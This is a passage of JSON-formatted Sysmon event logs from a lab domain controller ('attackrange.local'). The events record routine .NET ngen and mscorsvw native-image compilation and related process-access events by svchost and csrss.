{"EventTime":"2020-08-01 05:59:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7476,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:34.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C6-5F25-0000-00103D6F1000}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:34.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C6-5F25-0000-00103D6F1000}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:35.043\r\nProcessGuid: {A837DB8D-04C6-5F25-0000-00103D6F1000}\r\nProcessId: 4292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c4-0\\System.Device.dll\r\nCreationUtcTime: 2020-08-01 05:59:35.043","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:35.043","ProcessGuid":"{A837DB8D-04C6-5F25-0000-00103D6F1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10c4-0\\System.Device.dll","CreationUtcTime":"2020-08-01 05:59:35.043","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.075\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-001079721000}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.075","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-001079721000}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.075\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-001079721000}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.075","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-001079721000}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.075\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-001079721000}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.075","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-001079721000}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.137\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010D9751000}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.137","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010D9751000}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.137\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010D9751000}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.137","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010D9751000}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.137\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C7-5F25-0000-0010D9751000}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:35.137","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C7-5F25-0000-0010D9751000}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:35.731\r\nProcessGuid: {A837DB8D-04C7-5F25-0000-0010D9751000}\r\nProcessId: 4112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.DirectoryServices.AccountManagement.dll\r\nCreationUtcTime: 2020-08-01 05:59:35.731","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:35.731","ProcessGuid":"{A837DB8D-04C7-5F25-0000-0010D9751000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.DirectoryServices.AccountManagement.dll","CreationUtcTime":"2020-08-01 05:59:35.731","EventReceivedTime":"2020-08-01 05:59:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:35.778\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010B91B0F00}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 